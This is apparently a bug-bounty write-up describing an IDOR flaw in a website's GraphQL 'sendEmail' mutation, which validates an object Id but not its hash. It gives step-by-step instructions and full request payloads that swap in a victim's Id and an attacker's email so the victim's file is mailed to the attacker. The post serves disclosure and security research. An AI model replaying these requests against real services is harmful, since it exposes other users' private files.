IDOR Vulnerability In GraphQL Api On Website
Assalamualaikum Bug Hunter & Hello everyone.
In this article I want to share my experience with Insecure direct object references ( IDOR ) findings in GraphQL API on a website.
When I did testing with Sandro Proxy tool. Then, I found the responses snippet from the Graphql Api, here’s the snippet:
[{“operation”:”sendEmail”,”variables”:{“[Path]Id”:”1002203272",”[Path]Hash”:”38C09************788Y”,”lang”:”id”,”emails”:[“victim@gmail.com”]},”query”:”mutation sendEmail($[Path]Id: ID, $[Path]Hash: String, $lang: String, $emails: [String]) {\n sendEmail[Path]([Path]Id: $[Path]Id, [Path]Hash: $[Path]Hash, lang: $lang, emails: $emails)\n}\n”}]
The responses above are the behavior to download a file which will later be sent to the intended email.
In the Graphql Api responds above I took the snippet:
1. “[Path]Id”:”1002203272"
2. “[Path]Hash”:”38C09************788Y”
Here a website implements [Path]Id & [Path]Hash . I don’t know for sure the reason why it was made, and I assume if the [Path]Id is successfully found by the Attacker, then the Attacker must be able to find out the Victim’s [Path]Hash. And this implementation is very safe from IDOR attacks.
3. “emails”:[“victim@gmail.com”]
There’s nothing suspicious about this snippet.
From the above snippet, it may be very difficult to find IDOR vulnerabilities. Because the website implements [Path]Id & [Path]Hash in 1 file. But in the http responds snippet I found Insecure direct object references ( IDOR ) Vulnerabilities stemming from Lack of Authentication in GraphQL Api.
Follow me :)
- There is a lack of authentication error in Graphql Api while retrieving the file and then sending it to the destination email.
Why this happened?
Because in “operation”:”sendEmail” Graphql API only check “[Path]Id” and uncheck “[Path]Hash” .
2. Open your Burp Suite or Sandro Proxy. Enter the request below:
[{“operation”:”sendEmail”,”variables”:{“[Path]Id”:”1002203272",”[Path]Hash”:”38C09************788Y”,”lang”;”id”,”emails”:[“attacker@gmail.com”]},”query”:”mutation sendEmail($[Path]Id: ID, $[Path]Hash: String, $lang: String, $emails: [String]) {\n sendEmail[Path]([Path]Id: $[Path]Id, [Path]Hash: $[Path]Hash, lang: $lang, emails: $emails)\n}\n”}]
3. In the snippet:
A. “[Path]Id”:”1002203272"
You can change parameters with random numbers. Example :
[+]. “[Path]Id”:”1002203272" is my parameter file ( Attacker )
[+]. “[Path]Id”:”1002203271" is Victim’s file parameters ( Victim ) and other random parameters.
B. “emails”:[“attacker@gmail.com”]
You can change it with your email which later the victim’s file will be sent to your email.
4. Final :
[{“operation”:”sendEmail”,”variables”:{“[Path]Id”:”1002203271",”[Path]Hash”:”38C09************788Y”,”lang”:”id”,”emails”:[“attacker@gmail.com”]},”query”:”mutation sendEmail($[Path]Id: ID, $[Path]Hash: String, $lang: String, $emails: [String]) {\n sendEmail[Path]([Path]Id: $[Path]Id, [Path]Hash: $[Path]Hash, lang: $lang, emails: $emails)\n}\n”}]
5. Check your email, and the victim file is sent to your email.
Bounty : $$
